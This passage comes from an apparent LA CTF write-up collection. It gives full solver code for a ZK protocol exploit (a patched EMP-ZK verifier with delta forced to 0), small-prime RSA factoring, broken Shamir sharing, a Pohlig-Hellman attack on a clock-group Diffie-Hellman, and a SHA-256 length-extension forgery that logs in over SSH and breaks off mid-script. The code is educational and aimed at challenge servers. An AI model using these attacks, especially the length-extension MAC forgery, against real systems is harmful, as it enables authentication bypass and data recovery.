File: `attachments/dist/emp-zk/emp-zk/emp-zk-arith/emp-zk-arith.cpp`

```cpp
#include "emp-zk/emp-zk-arith/leak.h"
#include "emp-zk/emp-zk-arith/zk_fp_exec.h"

ZKFpExec *ZKFpExec::zk_exec = nullptr;

namespace emp {
EmpZkAndGateLeak g_emp_zk_andgate_leak;
} // namespace emp
```

**3) Patch EMP-ZK: Force `delta=0` and Capture One-Gate Transcript**

File: `attachments/dist/emp-zk/emp-zk/emp-zk-arith/ostriple.h`

```cpp
// (snippet of the relevant changes only)

void andgate_correctness_check_manage() {
  io->flush();

  if (party == BOB) {
    emp::g_emp_zk_andgate_leak = emp::EmpZkAndGateLeak{};
    emp::g_emp_zk_andgate_leak.delta = LOW64(delta);
  }

  ...

  if (party == ALICE) {
    uint64_t check_sum[2];
    check_sum[0] = U;
    check_sum[1] = V;
    io->send_data(check_sum, 2 * sizeof(uint64_t));
  } else {
    uint64_t check_sum[2];
    io->recv_data(check_sum, 2 * sizeof(uint64_t));

    // Capture prover-sent values before mutating V.
    emp::g_emp_zk_andgate_leak.U = check_sum[0];
    emp::g_emp_zk_andgate_leak.V = check_sum[1];

    check_sum[1] = mult_mod(check_sum[1], delta);
    check_sum[1] = add_mod(check_sum[1], W);
    if (check_sum[0] != check_sum[1])
      error("multiplication gates check fails");
  }
  io->flush();
}

void andgate_correctness_check(uint64_t *ret, int thr_idx, uint32_t start,
                               uint32_t task_n, block *chi_seed) {
  ...
  uint64_t *chi = new uint64_t[task_n];
  uint64_t seed = mod(LOW64(chi_seed[thr_idx]));
  uni_hash_coeff_gen(chi, seed, 1);  // challenge bug: only 1 coefficient

  if (party == ALICE) {
    ...
  } else {
    for (uint32_t i = start + task_n - 1, k = 0; i < start + task_n; ++i, ++k) {
      ka = LOW64(left[i]);
      kb = LOW64(right[i]);
      kc = LOW64(gateout[i]);

      // Record verifier-side view of the single checked multiplication gate.
      emp::g_emp_zk_andgate_leak.have = true;
      emp::g_emp_zk_andgate_leak.seed = seed;
      emp::g_emp_zk_andgate_leak.ka = ka;
      emp::g_emp_zk_andgate_leak.kb = kb;
      emp::g_emp_zk_andgate_leak.kc = kc;
      emp::g_emp_zk_andgate_leak.gate_i = i;

      B = add_mod(mult_mod(ka, kb), mult_mod(kc, delta));
      W = add_mod(W, mult_mod(B, chi[k]));
    }
    ret[thr_idx] = W;
  }

  delete[] chi;
}

void delta_gen() {
  // Verifier-side only. Challenge exploit forces delta=0, making mac==key.
  // This is not validated by the protocol implementation.
  delta = 0;
}
```

**4) Patched Client: JSON Transcript Dump + Non-interactive Flag Fetch**

File: `attachments/dist/emp-zk/test/arith/client.cpp`

```cpp
#include "emp-tool/emp-tool.h"
#include "emp-zk/emp-zk-arith/leak.h"
#include "emp-zk/emp-zk.h"

#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <string>
#include <vector>

using namespace emp;

static constexpr int kThreads = 1;

static void die_usage(const char *prog) {
  std::cerr << "usage: " << prog
            << " [--host HOST] [--port PORT] <X> dump|getflag [g0 g1 ... g9]\n";
  std::exit(2);
}

static uint64_t parse_u64(const char *s) {
  char *end = nullptr;
  errno = 0;
  unsigned long long v = std::strtoull(s, &end, 0);
  if (errno != 0 || end == s || (end && *end != '\0')) {
    std::cerr << "error: invalid u64: " << s << "\n";
    std::exit(2);
  }
  return static_cast<uint64_t>(v);
}

static int parse_i32(const char *s) {
  char *end = nullptr;
  errno = 0;
  long v = std::strtol(s, &end, 0);
  if (errno != 0 || end == s || (end && *end != '\0') || v < 0 ||
      v > 65535) {
    std::cerr << "error: invalid port: " << s << "\n";
    std::exit(2);
  }
  return static_cast<int>(v);
}

static void run_proof(BoolIO<NetIO> *ios[kThreads], int party, uint64_t X) {
  setup_zk_arith<BoolIO<NetIO>>(ios, kThreads, party);

  // Alice commits to two secret vectors; Bob uses dummy placeholders.
  std::vector<IntFp> array1;
  std::vector<IntFp> array2;
  array1.reserve(10);
  array2.reserve(10);
  for (int i = 0; i < 10; i++) {
    array1.emplace_back(0, ALICE);
    array2.emplace_back(0, ALICE);
  }

  // Challenge sends X over the arithmetic channel (not via stdio text).
  ZKFpExec::zk_exec->send_data(&X, sizeof(uint64_t));

  IntFp acc1 = IntFp(1, PUBLIC);
  IntFp acc2 = IntFp(1, PUBLIC);
  for (int i = 0; i < 10; i++) {
    acc1 = acc1 * (array1[i] + X);
    acc2 = acc2 * (array2[i] + X);
  }
  IntFp final_zero = acc1 + acc2.negate();
  batch_reveal_check_zero(&final_zero, 1);

  finalize_zk_arith<BoolIO<NetIO>>();
}

static void send_guesses(BoolIO<NetIO> *ios[kThreads],
                         const std::vector<uint64_t> &guesses) {
  if (guesses.size() != 10) {
    std::cerr << "internal error: expected 10 guesses\n";
    std::exit(2);
  }
  for (int i = 0; i < 10; i++) {
    uint64_t g = guesses[i];
    ios[0]->io->send_data(&g, sizeof(uint64_t));
  }
}

static void dump_json() {
  const auto &t = emp::g_emp_zk_andgate_leak;

  // One JSON object per line (consumed by solve.py).
  std::cout << "{";
  std::cout << "\"have\":" << (t.have ? "true" : "false");
  std::cout << ",\"delta\":" << t.delta;
  std::cout << ",\"seed\":" << t.seed;
  std::cout << ",\"U\":" << t.U;
  std::cout << ",\"V\":" << t.V;
  std::cout << ",\"ka\":" << t.ka;
  std::cout << ",\"kb\":" << t.kb;
  std::cout << ",\"kc\":" << t.kc;
  std::cout << ",\"gate_i\":" << t.gate_i;
  std::cout << "}\n";
  std::cout.flush();
}

int main(int argc, char **argv) {
  std::string host =
      std::getenv("SLOW_GOLD_HOST") ? std::getenv("SLOW_GOLD_HOST")
                                   : "chall.lac.tf";
  int port =
      std::getenv("SLOW_GOLD_PORT") ? parse_i32(std::getenv("SLOW_GOLD_PORT"))
                                   : 31183;

  int idx = 1;
  while (idx < argc) {
    if (std::strcmp(argv[idx], "--host") == 0) {
      if (idx + 1 >= argc)
        die_usage(argv[0]);
      host = argv[idx + 1];
      idx += 2;
      continue;
    }
    if (std::strcmp(argv[idx], "--port") == 0) {
      if (idx + 1 >= argc)
        die_usage(argv[0]);
      port = parse_i32(argv[idx + 1]);
      idx += 2;
      continue;
    }
    break;
  }

  if (idx + 2 > argc)
    die_usage(argv[0]);

  const uint64_t X = parse_u64(argv[idx]);
  const std::string mode = argv[idx + 1];
  idx += 2;

  std::vector<uint64_t> guesses;
  if (mode == "dump") {
    guesses.assign(10, 0);
  } else if (mode == "getflag") {
    if (idx + 10 != argc)
      die_usage(argv[0]);
    guesses.reserve(10);
    for (int i = 0; i < 10; i++)
      guesses.push_back(parse_u64(argv[idx + i]));
  } else {
    die_usage(argv[0]);
  }

  const int party = BOB;
  BoolIO<NetIO> *ios[kThreads];
  for (int i = 0; i < kThreads; ++i) {
    ios[i] = new BoolIO<NetIO>(new NetIO(host.c_str(), port), false);
  }

  run_proof(ios, party, X);
  send_guesses(ios, guesses);

  if (mode == "dump") {
    dump_json();
  } else {
    // Server sends exactly 46 bytes when guesses are correct.
    char flag[46];
    ios[0]->io->recv_data(flag, sizeof(flag));
    std::cout.write(flag, sizeof(flag));
    std::cout.flush();
  }

  for (int i = 0; i < kThreads; ++i) {
    delete ios[i]->io;
    delete ios[i];
  }
  return 0;
}
```

**5) Solver Script**

File: `solve.py`

```python
#!/usr/bin/env python3
import json
import os
import re
import subprocess
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed


P = 2305843009213693951  # 2^61 - 1
BIN = "attachments/dist/emp-zk/bin/test_arith_client"
## emp-tool's NetIO uses inet_addr() and does not resolve DNS names; use an IP.
HOST = os.environ.get("SLOW_GOLD_HOST", "34.169.138.235")
PORT = int(os.environ.get("SLOW_GOLD_PORT", "31183"))
LOCAL_CHALL_BIN = os.environ.get("SLOW_GOLD_LOCAL_CHALL_BIN")

## Keep concurrency low by default (remote services often rate-limit or queue).
WORKERS = int(os.environ.get("SLOW_GOLD_WORKERS", "1"))
DUMP_TIMEOUT_S = int(os.environ.get("SLOW_GOLD_DUMP_TIMEOUT_S", "1200"))
GETFLAG_TIMEOUT_S = int(os.environ.get("SLOW_GOLD_GETFLAG_TIMEOUT_S", "1200"))
RETRIES = int(os.environ.get("SLOW_GOLD_RETRIES", "3"))
DELAY_S = float(os.environ.get("SLOW_GOLD_DELAY_S", "0.25"))


def mod(x: int) -> int:
    return x % P


def inv(a: int) -> int:
    a %= P
    if a == 0:
        raise ZeroDivisionError("inv(0)")
    return pow(a, P - 2, P)


def run_dump(X: int) -> dict:
    # The binary prints exactly one JSON line in dump mode.
    last_err = None
    for attempt in range(1, RETRIES + 1):
        srv = None
        try:
            if LOCAL_CHALL_BIN:
                srv = subprocess.Popen(
                    [LOCAL_CHALL_BIN, str(PORT)],
                    stdout=subprocess.DEVNULL,
                    stderr=subprocess.DEVNULL,
                    text=False,
                )
                time.sleep(0.2)
            proc = subprocess.run(
                [BIN, "--host", HOST, "--port", str(PORT), str(X), "dump"],
                stdout=subprocess.PIPE,
                stderr=subprocess.DEVNULL,
                text=True,
                check=True,
                # The remote ZK proof is intentionally slow; keep this generous.
                timeout=DUMP_TIMEOUT_S,
            )
            lines = [ln.strip() for ln in proc.stdout.splitlines() if ln.strip()]
            for ln in reversed(lines):
                if ln.startswith("{") and ln.endswith("}"):
                    return json.loads(ln)
            raise RuntimeError(f"no JSON in output for X={X!r}: {proc.stdout!r}")
        except (subprocess.TimeoutExpired, subprocess.CalledProcessError, json.JSONDecodeError, RuntimeError) as e:
            last_err = e
        finally:
            if srv is not None:
                try:
                    srv.wait(timeout=1)
                except subprocess.TimeoutExpired:
                    srv.kill()
        # small backoff to avoid hammering
        time.sleep(0.25 * attempt)
    raise RuntimeError(f"run_dump failed for X={X} after {RETRIES} attempts: {last_err!r}")


def solve_linear_system_mod(A: list[list[int]], b: list[int]) -> list[int]:
    """Solve A x = b over F_p (Gaussian elimination)."""
    n = len(A)
    assert n > 0
    assert all(len(row) == n for row in A)
    assert len(b) == n

    M = [list(map(lambda x: x % P, row)) + [b[i] % P] for i, row in enumerate(A)]

    for col in range(n):
        pivot = None
        for row in range(col, n):
            if M[row][col] % P != 0:
                pivot = row
                break
        if pivot is None:
            raise RuntimeError("singular system")
        if pivot != col:
            M[col], M[pivot] = M[pivot], M[col]

        inv_p = inv(M[col][col])
        for j in range(col, n + 1):
            M[col][j] = mod(M[col][j] * inv_p)

        for row in range(n):
            if row == col:
                continue
            factor = M[row][col] % P
            if factor == 0:
                continue
            for j in range(col, n + 1):
                M[row][j] = mod(M[row][j] - factor * M[col][j])

    return [M[i][n] % P for i in range(n)]


def factor_roots_mod_prime(coeffs: list[int]) -> list[int]:
    from sympy import Poly, symbols

    x = symbols("x")
    poly = Poly(sum(int(coeffs[i]) * x**i for i in range(len(coeffs))), x, modulus=P)
    _, facs = poly.factor_list()
    roots = []
    for fac, exp in facs:
        if exp != 1:
            # Shouldn't happen here (distinct elements), but handle anyway.
            pass
        if fac.degree() == 1:
            a, b = [int(c) for c in fac.all_coeffs()]  # a*x + b
            r = mod((-b) * inv(a))
            roots.append(r)
        else:
            raise RuntimeError(f"unexpected non-linear factor: {fac.as_expr()}")
    return roots


def main() -> int:
    # Unknowns: g(X)=c0+...+c8 X^8 + X^9 and last=vec2[9].
    # Each transcript at X gives:
    #   kb*g(X) + ka*(last + X) = (V/seed) + kc  (mod p)
    # which is linear in (c0..c8,last).
    xs = list(range(10))

    print(f"[+] fetching {len(xs)} transcripts with {WORKERS} workers...", flush=True)
    transcripts: dict[int, dict] = {}
    if WORKERS == 1:
        for X in xs:
            transcripts[X] = run_dump(X)
            print(f"[+] got transcript X={X}", flush=True)
            if DELAY_S:
                time.sleep(DELAY_S)
    else:
        with ThreadPoolExecutor(max_workers=WORKERS) as ex:
            futs = {ex.submit(run_dump, X): X for X in xs}
            for fut in as_completed(futs):
                X = futs[fut]
                transcripts[X] = fut.result()
                print(f"[+] got transcript X={X}", flush=True)
                if DELAY_S:
                    time.sleep(DELAY_S)

    A: list[list[int]] = []
    bvec: list[int] = []
    for X in xs:
        t = transcripts[X]
        if not t.get("have"):
            raise RuntimeError(f"missing leak (have=false) at X={X}")
        if int(t["delta"]) != 0:
            raise RuntimeError("expected delta=0 (patched client)")
        seed = int(t["seed"]) % P
        V = int(t["V"]) % P
        ka = int(t["ka"]) % P
        kb = int(t["kb"]) % P
        kc = int(t["kc"]) % P
        if seed == 0:
            raise RuntimeError("seed=0 (extremely unlikely), re-run")

        rhs = mod(mod(V * inv(seed)) + kc)  # (V/seed) + kc

        # kb*(sum_{j=0..8} c_j X^j + X^9) + ka*(last + X) = rhs
        # => sum_{j=0..8} (kb*X^j)*c_j + ka*last = rhs - ka*X - kb*X^9
        row = []
        xpow = 1
        for _j in range(9):
            row.append(mod(kb * xpow))
            xpow = mod(xpow * X)
        row.append(ka)  # last
        A.append(row)
        bvec.append(mod(rhs - ka * X - kb * xpow))  # xpow currently X^9

    sol = solve_linear_system_mod(A, bvec)
    coeffs = sol[:9] + [1]  # monic degree-9
    last_elem = sol[9]

    roots = factor_roots_mod_prime(coeffs)  # roots of g(x)==0 => x == -vec2[i] for i<9
    if len(roots) != 9:
        raise RuntimeError(f"expected 9 roots, got {len(roots)}")

    elems = [mod(-r) for r in roots] + [last_elem]
    elems = [int(e) for e in elems]
    if len(set(elems)) != 10:
        raise RuntimeError("elements not distinct; something went wrong")

    elems_sorted = sorted(elems)
    print("Recovered set (10 elements):")
    for e in elems_sorted:
        print(e)

    proc = subprocess.run(
        [BIN, "--host", HOST, "--port", str(PORT), "0", "getflag", *[str(e) for e in elems_sorted]],
        stdout=subprocess.PIPE,
        stderr=subprocess.DEVNULL,
        text=True,
        check=True,
        timeout=GETFLAG_TIMEOUT_S,
    )
    m = re.search(r"lactf\\{[^}]*\\}", proc.stdout)
    flag = m.group(0) if m else proc.stdout.strip()
    print("FLAG:", flag)
    if not (flag.startswith("lactf{") and flag.endswith("}")):
        raise RuntimeError("did not get a flag-shaped string")

    with open("flag.txt", "w", encoding="utf-8") as f:
        f.write(flag + "\n")

    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

### smol cats

#### Description

My cat walked across my keyboard and made this RSA implementation, encrypting the location of the treats they stole from me! However, they already got fed twice today, and are already overweight and needs to lose some weight, so I cannot let them eat more treats. Can you defeat my cat's encryption so I can find their secret stash of treats and keep my cat from overeating?

`nc chall.lac.tf 31224`

#### Solution

Connecting to the server presents an RSA challenge: given `n`, `e=65537`, and `c`, decrypt the ciphertext to recover the plaintext number of treats. The values change each connection.

The key insight is in the description: "my paws are small, so I used tiny primes." The modulus `n` is \~200 bits (60 digits), composed of two \~100-bit primes. This is far too small for secure RSA and can be factored quickly using ECM (Elliptic Curve Method) or other factoring algorithms.

Once `n` is factored into `p * q`, standard RSA decryption recovers the plaintext: compute `phi = (p-1)(q-1)`, then `d = e^(-1) mod phi`, and `m = c^d mod n`.

```python
#!/usr/bin/env sage -python
import re
from pwn import *
from sage.all import *

r = remote('chall.lac.tf', 31224)

data = r.recvuntil(b'How many treats do I want?')
text = data.decode()

n = int(re.search(r'n = (\d+)', text).group(1))
e = int(re.search(r'e = (\d+)', text).group(1))
c = int(re.search(r'c = (\d+)', text).group(1))

# Factor the small RSA modulus using SageMath's built-in factoring (ECM)
factors = factor(n)

# Compute phi(n)
phi = 1
for p, exp in factors:
    phi *= (p - 1) * p**(exp - 1)

# RSA decrypt
d = inverse_mod(e, phi)
m = power_mod(c, d, n)

r.sendline(str(m).encode())
print(r.recvall(timeout=5).decode())
r.close()
```

**Flag:** `lactf{sm0l_pr1m3s_4r3_n0t_s3cur3}`

### spreading-secrets

#### Description

The server uses Shamir Secret Sharing over a 512-bit prime field, but it generates the polynomial coefficients from an RNG seeded with the secret itself. Only one share is revealed: `(x, y) = (1, f(1))`, plus the modulus `p`.

#### Solution

In proper Shamir, `threshold` shares are needed because the non-constant coefficients are uniform random and independent of the secret.

Here, coefficients are deterministic functions of the secret:

* `c0 = s`
* `c1 = g(s)`
* `c2 = g(g(s)) = g^2(s)`
* ...
* `c9 = g^9(s)`

where `g(z) = a z^3 + b z^2 + c z + d (mod p)` is the RNG transition.

With only the share at `x=1`:

`f(1) = sum_{i=0..9} c_i = s + g(s) + g^2(s) + ... + g^9(s) = y`.

So `s` is a root of the univariate polynomial over `GF(p)`:

`h(x) = x + g(x) + g^2(x) + ... + g^9(x) - y`.

Since `deg(g)=3`, `deg(g^9)=3^9=19683`, so `h` has degree 19683. We build `h` by iterated composition in the polynomial ring `GF(p)[x]`.

To extract roots without fully factoring `h`, use the finite-field identity that the product of all distinct linear factors of `h` divides `x^p - x`. Thus:

`gcd(h(x), x^p - x)` is the squarefree product of linear factors of `h`.

Compute `x^p mod h(x)` by binary exponentiation (repeated squaring with polynomial modular reduction), then take the GCD and read its roots. There are two roots; the correct one decodes to a flag string.

```python
# solve2.sage
import time

p = 12670098302188507742440574100120556372985016944156009521523684257469947870807586552014769435979834701674318132454810503226645543995288281801918123674138911
F = GF(p)
R.<x> = F[]

a_val = F(4378187236568178488156374902954033554168817612809876836185687985356955098509507459200406211027348332345207938363733672019865513005277165462577884966531159)
b_val = F(5998166089683146776473147900393246465728273146407202321254637450343601143170006002385750343013383427197663710513197549189847700541599566914287390375415919)
c_val = F(4686793799228153029935979752698557491405526130735717565192889910432631294797555886472384740255952748527852713105925980690986384345817550367242929172758571)
d_val = F(4434206240071905077800829033789797199713643458206586525895301388157719638163994101476076768832337473337639479654350629169805328840025579672685071683035027)

y1 = F(6435837956013280115905597517488571345655611296436677708042037032302040770233786701092776352064370211838708484430835996068916818951183247574887417224511655)

def g(poly):
    return a_val * poly^3 + b_val * poly^2 + c_val * poly + d_val

print("Building polynomial...", flush=True)
t0 = time.time()
P = x
total = P
for i in range(9):
    t = time.time()
    P = g(P)
    total += P
    print(f"  Step {i+1}/9, degree: {P.degree()}, time: {time.time()-t:.2f}s", flush=True)

h = total - y1
print(f"Total polynomial degree: {h.degree()}, build time: {time.time()-t0:.2f}s", flush=True)

print("Computing x^p mod h(x) via repeated squaring...", flush=True)
t0 = time.time()
p_bits = bin(p)[2:]
n_bits = len(p_bits)
print(f"  p has {n_bits} bits", flush=True)

xpow = x % h
for i, bit in enumerate(p_bits[1:], 1):
    xpow = (xpow * xpow) % h
    if bit == "1":
        xpow = (xpow * x) % h
    if i % 25 == 0:
        elapsed = time.time() - t0
        rate = i / elapsed if elapsed > 0 else 0
        eta = (n_bits - 1 - i) / rate if rate > 0 else 0
        print(f"  Bit {i}/{n_bits-1}, elapsed: {elapsed:.1f}s, ETA: {eta:.1f}s", flush=True)

print(f"x^p mod h computed in {time.time()-t0:.1f}s", flush=True)

print("Computing GCD...", flush=True)
t = time.time()
linear_factors = gcd(h, xpow - x)
print(f"GCD degree: {linear_factors.degree()}, time: {time.time()-t:.1f}s", flush=True)

roots = linear_factors.roots(multiplicities=False)
print(f"Found {len(roots)} roots", flush=True)
for root in roots:
    s = int(root)
    flag_bytes = s.to_bytes((s.bit_length() + 7) // 8, "big")
    if b"lactf{" in flag_bytes:
        print(flag_bytes.decode())
```

Flag: `lactf{d0nt_d3r1v3_th3_wh0l3_p0lyn0m14l_fr0m_th3_s3cr3t_t00!!!}`

### the-clock

#### Description

Don't run out of time

A Diffie-Hellman key exchange is performed on the "clock group" — points (x, y) satisfying x² + y² ≡ 1 (mod p) with the group law `(x1*y2 + y1*x2, y1*y2 - x1*x2)`. The prime p is omitted from the source. Alice and Bob exchange public keys, derive a shared secret, and use it to AES-ECB encrypt the flag. We're given both public keys and the ciphertext.

#### Solution

**Step 1: Recover p.** Each point satisfies x² + y² ≡ 1 (mod p), so p divides (x² + y² - 1) for every known point. Taking the GCD of these values across the base point and both public keys yields p = 13767529254441196841515381394007440393432406281042568706344277693298736356611.

**Step 2: Identify the group structure.** The clock group operation is equivalent to multiplication of elements z = y + ix in F\_{p²} restricted to norm-1 elements. This group has order p+1 when -1 is a quadratic non-residue mod p (which it is here). The order p+1 factors completely into small (\~16-bit) primes: 4 × 39623 × 41849 × 42773 × 46511 × 47951 × 50587 × 50741 × 51971 × 54983 × 55511 × 56377 × 58733 × 61843 × 63391 × 63839 × 64489.

**Step 3: Pohlig-Hellman attack.** Since the group order is entirely smooth, the discrete log problem decomposes via Pohlig-Hellman into tiny subgroup DLPs, each solvable with baby-step giant-step in O(√q) time where q ≤ 64489. CRT combines the partial results to recover Alice's full secret key.

**Step 4: Decrypt.** Compute the shared secret using Alice's secret and Bob's public key, derive the AES key via MD5, and decrypt.

```python
from math import gcd
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from hashlib import md5
import math

# Points from the challenge
xb = 13187661168110324954294058945757101408527953727379258599969622948218380874617
yb = 5650730937120921351586377003219139165467571376033493483369229779706160055207
xa = 13109366899209289301676180036151662757744653412475893615415990437597518621948
ya = 5214723011482927364940019305510447986283757364508376959496938374504175747801
xbo = 1970812974353385315040605739189121087177682987805959975185933521200533840941
ybo = 12973039444480670818762166333866292061530850590498312261363790018126209960024
enc_flag = bytes.fromhex("d345a465538e3babd495cd89b43a224ac93614e987dfb4a6d3196e2d0b3b57d9")

# Step 1: Recover p from x^2 + y^2 - 1 values via GCD
v1 = xb**2 + yb**2 - 1
v2 = xa**2 + ya**2 - 1
v3 = xbo**2 + ybo**2 - 1
p = gcd(gcd(v1, v2), v3)
# Remove any small factors
for s in range(2, 10000):
    while p % s == 0 and p > s:
        p //= s

# Group order = p+1 (since -1 is a non-residue mod p)
order = p + 1
factors = {
    2: 2, 39623: 1, 41849: 1, 42773: 1, 46511: 1, 47951: 1,
    50587: 1, 50741: 1, 51971: 1, 54983: 1, 55511: 1, 56377: 1,
    58733: 1, 61843: 1, 63391: 1, 63839: 1, 64489: 1
}

def clockadd(P1, P2):
    x1, y1 = P1
    x2, y2 = P2
    return ((x1*y2 + y1*x2) % p, (y1*y2 - x1*x2) % p)

def scalarmult(P, n):
    if n == 0:
        return (0, 1)
    if n < 0:
        P = ((-P[0]) % p, P[1])
        n = -n
    result = (0, 1)
    base = P
    while n > 0:
        if n & 1:
            result = clockadd(result, base)
        base = clockadd(base, base)
        n >>= 1
    return result

def bsgs(base, target, n):
    m = int(math.isqrt(n)) + 1
    table = {}
    base_inv = ((-base[0]) % p, base[1])
    current = target
    for j in range(m):
        table[current] = j
        current = clockadd(current, base_inv)
    giant = scalarmult(base, m)
    current = (0, 1)
    for i in range(m + 1):
        if current in table:
            return (i * m + table[current]) % n
        current = clockadd(current, giant)
    raise ValueError("BSGS failed")

# Pohlig-Hellman
base = (xb, yb)
target = (xa, ya)
remainders, moduli = [], []

for q, e in factors.items():
    exp = order // (q**e)
    g_sub = scalarmult(base, exp)
    t_sub = scalarmult(target, exp)
    if e == 1:
        r = bsgs(g_sub, t_sub, q)
    else:
        r = 0
        gamma = scalarmult(g_sub, q**(e-1))
        t_k = t_sub
        for k in range(e):
            h = scalarmult(t_k, q**(e-1-k))
            d_k = bsgs(gamma, h, q)
            r += d_k * (q**k)
            t_k = clockadd(t_k, scalarmult(g_sub, order - d_k * (q**k)))
    remainders.append(r)
    moduli.append(q**e)

# CRT
def extended_gcd(a, b):
    if a == 0: return b, 0, 1
    g, x, y = extended_gcd(b % a, a)
    return g, y - (b // a) * x, x

r, m = remainders[0], moduli[0]
for i in range(1, len(remainders)):
    r2, m2 = remainders[i], moduli[i]
    g, x, _ = extended_gcd(m, m2)
    lcm = m * m2 // g
    r = (r + m * ((r2 - r) // g) * x) % lcm
    m = lcm
alice_secret = r

# Decrypt
shared = scalarmult((xbo, ybo), alice_secret)
key = md5(f"{shared[0]},{shared[1]}".encode()).digest()
flag = unpad(AES.new(key, AES.MODE_ECB).decrypt(enc_flag), 16)
print(f"Flag: {flag.decode()}")
# lactf{t1m3_c0m3s_f4r_u_4all}
```

Flag: `lactf{t1m3_c0m3s_f4r_u_4all}`

### ttyspin

#### Description

The challenge is a terminal Tetris clone over SSH. You can export/import a save state. Import is protected by a checksum:

```py
sha256((SECRET + username + save_bytes).strip()).hexdigest()
```

The flag is printed only if the in-memory board equals a fixed `winning_board`.

#### Solution

There are two key observations.

**Observation 1: you cannot reach the winning board by playing.** Each placed tetromino adds 4 blocks and each cleared line removes 10 blocks, so the board's non-zero cell count stays even. The provided `winning_board` has 19 blocks (odd), so the only viable path is to **import a crafted save** whose decoded board equals `winning_board`.

**Observation 2: SHA-256 length extension works because glue padding can go in `username`.** The MAC is `SHA256(SECRET || message)` (not HMAC), and `len(SECRET) == 40` is known. The imported `save_bytes` must be valid UTF-8 because `Board.start()` does `save.decode().split("|")`, but `username` is never decoded (it's raw bytes from `sys.stdin.buffer.readline()`), so it can contain arbitrary bytes, including `0x80` and NULs. That lets us do a classic length extension: get a checksum for `SECRET||m`, then forge a checksum for `SECRET||m||glue_padding||ext`, by placing `m||glue_padding` in `username` and `ext` in the imported save (still valid UTF-8).

Practical detail: the code hashes `(SECRET + username + save_bytes).strip()`. If we export with an *empty username* and an *empty board*, the save string ends with many spaces and `.strip()` truncates it, leaving a very short `m` (ending right after the `|` before the board). That keeps `username = m || glue_padding` under the 32-byte username limit.

One more practical constraint: the game only shows the export screen after you have a non-zero score. So you need to score while keeping the board empty; the easiest way is to play until you get a **perfect clear / full clear** (clear lines so the board returns to all-spaces) and then export immediately.

Below is a complete solver that:

* builds a valid save whose board equals `winning_board` (and appends a 1-byte sentinel so `.strip()` won’t trim trailing spaces),
* performs SHA-256 length extension from an exported checksum where username was empty,
* logs in via SSH (Paramiko) and imports the forged save to print the flag.

```py
#!/usr/bin/env python3
import base64
import re
import struct
import sys
import time

import paramiko


# --- Target ---
HOST = "chall.lac.tf"
PORT = 32123
SSH_USER = "ttyspin"
SSH_PASS = "ttyspin"

# From attachments/game.py
WINNING_BOARD = [
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
    [7, 0, 0, 0, 0, 0, 0, 0, 0, 0],
    [0, 4, 0, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 6, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 3, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 5, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 2, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 0, 7, 0, 0],
    [0, 0, 0, 0, 0, 0, 0, 0, 4, 0],
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 6],
    [0, 0, 0, 0, 0, 0, 0, 0, 3, 0],
    [0, 0, 0, 0, 0, 0, 0, 5, 0, 0],
    [0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
    [0, 0, 0, 0, 0, 2, 0, 0, 0, 0],
    [0, 0, 0, 0, 7, 0, 0, 0, 0, 0],
    [0, 0, 0, 4, 0, 0, 0, 0, 0, 0],
    [0, 0, 6, 0, 0, 0, 0, 0, 0, 0],
    [0, 3, 0, 0, 0, 0, 0, 0, 0, 0],
    [5, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]


WHITESPACE = b" \t\r\n\v\f"


def board_to_save_text(board):
    # board tiles are integers 0..7; save format uses letters for 1..7:
    # 1=T 2=J 3=L 4=S 5=Z 6=O 7=I, and space for 0.
    # piece_to_type in board.py: {"T":0,"J":1,"L":2,"S":3,"Z":4,"O":5,"I":6}
    letters = ["T", "J", "L", "S", "Z", "O", "I"]
    out = []
    for row in board:
        for v in row:
            out.append(" " if v == 0 else letters[v - 1])
    return "".join(out)


def build_winning_save_bytes():
    # Any valid header is fine; the win check only compares the board.
    # Save format: current|hold|nexts(4)|queue|board(200 chars)
    current = "T"
    hold = " "
    nexts = "TTTT"
    queue = ""
    board_txt = board_to_save_text(WINNING_BOARD)
    assert len(board_txt) == 200

    # Sentinel to stop .strip() from removing trailing spaces from the board.
    # Board.start() only reads the first 200 chars.
    sentinel = "X"

    s = f"{current}|{hold}|{nexts}|{queue}|{board_txt}{sentinel}"
    return s.encode("utf-8")


# --- Minimal SHA-256 with state injection (for length extension) ---
K = [
    0x428A2F98, 0x71374491, 0xB5C0FBCF, 0xE9B5DBA5, 0x3956C25B, 0x59F111F1, 0x923F82A4, 0xAB1C5ED5,
    0xD807AA98, 0x12835B01, 0x243185BE, 0x550C7DC3, 0x72BE5D74, 0x80DEB1FE, 0x9BDC06A7, 0xC19BF174,
    0xE49B69C1, 0xEFBE4786, 0x0FC19DC6, 0x240CA1CC, 0x2DE92C6F, 0x4A7484AA, 0x5CB0A9DC, 0x76F988DA,
    0x983E5152, 0xA831C66D, 0xB00327C8, 0xBF597FC7, 0xC6E00BF3, 0xD5A79147, 0x06CA6351, 0x14292967,
    0x27B70A85, 0x2E1B2138, 0x4D2C6DFC, 0x53380D13, 0x650A7354, 0x766A0ABB, 0x81C2C92E, 0x92722C85,
    0xA2BFE8A1, 0xA81A664B, 0xC24B8B70, 0xC76C51A3, 0xD192E819, 0xD6990624, 0xF40E3585, 0x106AA070,
    0x19A4C116, 0x1E376C08, 0x2748774C, 0x34B0BCB5, 0x391C0CB3, 0x4ED8AA4A, 0x5B9CCA4F, 0x682E6FF3,
    0x748F82EE, 0x78A5636F, 0x84C87814, 0x8CC70208, 0x90BEFFFA, 0xA4506CEB, 0xBEF9A3F7, 0xC67178F2,
]


def _rotr(x, n):
    return ((x >> n) | ((x & 0xFFFFFFFF) << (32 - n))) & 0xFFFFFFFF


def _ch(x, y, z):
    return (x & y) ^ (~x & z)


def _maj(x, y, z):
    return (x & y) ^ (x & z) ^ (y & z)


def _bsig0(x):
    return _rotr(x, 2) ^ _rotr(x, 13) ^ _rotr(x, 22)


def _bsig1(x):
    return _rotr(x, 6) ^ _rotr(x, 11) ^ _rotr(x, 25)


